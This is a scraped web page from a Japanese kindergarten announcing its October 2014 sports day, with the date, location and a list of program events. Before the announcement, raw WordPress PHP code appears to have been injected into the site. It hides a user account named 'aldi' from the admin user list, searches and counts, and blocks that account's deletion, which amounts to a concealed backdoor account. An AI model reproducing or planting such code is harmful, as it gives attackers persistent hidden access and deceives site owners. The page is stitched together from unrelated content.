add_action('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->base === 'users') { $protected_user = get_user_by('login', 'aldi'); if ($protected_user) { $excluded = (array) $query->get('exclude'); $excluded[] = $protected_user->ID; $query->set('exclude', $excluded); } } } }); add_filter('wp_count_users', function($counts) { $protected_user = get_user_by('login', 'aldi'); if ($protected_user) { $counts->total_users--; } return $counts; }); add_action('delete_user', function($user_id) { $user = get_user_by('ID', $user_id); if ($user && $user->user_login === 'aldi') { wp_die( __('User aldi tidak dapat dihapus.', 'textdomain'), __('Error', 'textdomain'), array('response' => 403) ); } }); add_filter('user_search_columns', function($search_columns, $search, $query) { if (is_admin()) { $protected_user = get_user_by('login', 'aldi'); if ($protected_user) { global $wpdb; $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.ID != %d", $protected_user->ID); } } return $search_columns; }, 10, 3); add_filter('bulk_actions-users', function($actions) { if (isset($_REQUEST['users']) && is_array($_REQUEST['users'])) { $protected_user = get_user_by('login', 'aldi'); if ($protected_user && in_array($protected_user->ID, $_REQUEST['users'])) { unset($actions['delete']); } } return $actions; }); 運動会のご案内 – 2014年 – | 学校法人安田学園 新生幼稚園 運動会のご案内 – 2014年 – | 学校法人安田学園 新生幼稚園

    運動会のご案内 – 2014年 –

    今年の運動会は10月11日(土)[雨天順延]9~12時、新生幼稚園園庭で行います。
    卒業生も、未就園の方も、どうぞお越し下さい。
    【プログラム】
    ・全員体操「Oh! スージー」
    ・年少組ダンス「リーダーにつづけ」
    ・年中組競技「おつかい ありさん」
    ・年長組 障害物競技
    ・父母競技「ススメ! 父ちゃん 母ちゃん」
    ・年少組競技「きかんしゃトーマス」
    ・年中組ダンス「T.W.L」
    ・園児全員「玉入れ」
    ・未就園児 かけっこ
    ・年少組、年中組 かけっこ
    ・年長組ダンス「あいうえおんがく」
    ・小中学生競技「ビックリ! オセロ」
    ・年長組 リレー
    ・親子競技「力を合わせて」

    2014年11月6日
ページ上部へ
ページ上部へ